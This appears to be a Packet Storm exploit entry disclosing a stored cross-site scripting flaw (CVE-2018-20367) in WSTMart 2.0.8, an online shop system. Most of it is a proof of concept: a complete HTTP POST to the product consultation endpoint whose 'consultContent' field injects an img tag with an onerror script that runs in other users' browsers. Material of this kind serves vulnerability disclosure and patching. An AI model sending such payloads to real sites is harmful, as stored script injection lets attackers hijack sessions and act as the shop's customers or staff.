WSTMart 2.0.8 Cross Site Scripting

2018-12-24T00:00:00
ID PACKETSTORM:150914
Type packetstorm
Reporter linfeng
Modified 2018-12-24T00:00:00

Description

                                        
                                            `# Exploit Title: WSTMart 2.0.8 - Cross-Site Scripting  
# Date: 2018-12-23  
# Exploit Author: linfeng  
# Vendor Homepage: https://github.com/wstmall/wstmart/  
# Software Link: http://www.wstmart.net/  
# Version: WSTMart 2.0.8_181212   
# CVE: CVE-2018-20367  
  
# 0x01 stored XSS (PoC)  
Function point: mall some commodity details - commodity consultation  
poc:  
POST /st/wstmart_v2.0.8_181212/index.php/home/goodsconsult/add.html HTTP/1.1  
Host: xx.xx.xx.xx  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0  
Accept: /  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Referer: http://xx.xx.xx.xx/st/wstmart_v2.0.8_181212/goods-2.html  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 83  
Connection: close  
Cookie: PHPSESSID=d1jf7a74dk57sk5jebtg2nckeu; WSTMART_history_goods=think%3A%5B%222%22%2C%2265%22%5D; UM_distinctid=167d5b268981b9-03d665d7d22d54-4c312e7e-100200-167d5b2689945e; CNZZDATA1263804910=767510099-1545475868-%7C1545481454  
  
goodsId=2&consultType=1&consultContent=%3Cimg+src%3Dx+onerror%3Dalert(%2Fxss%2F)%3E  
  
`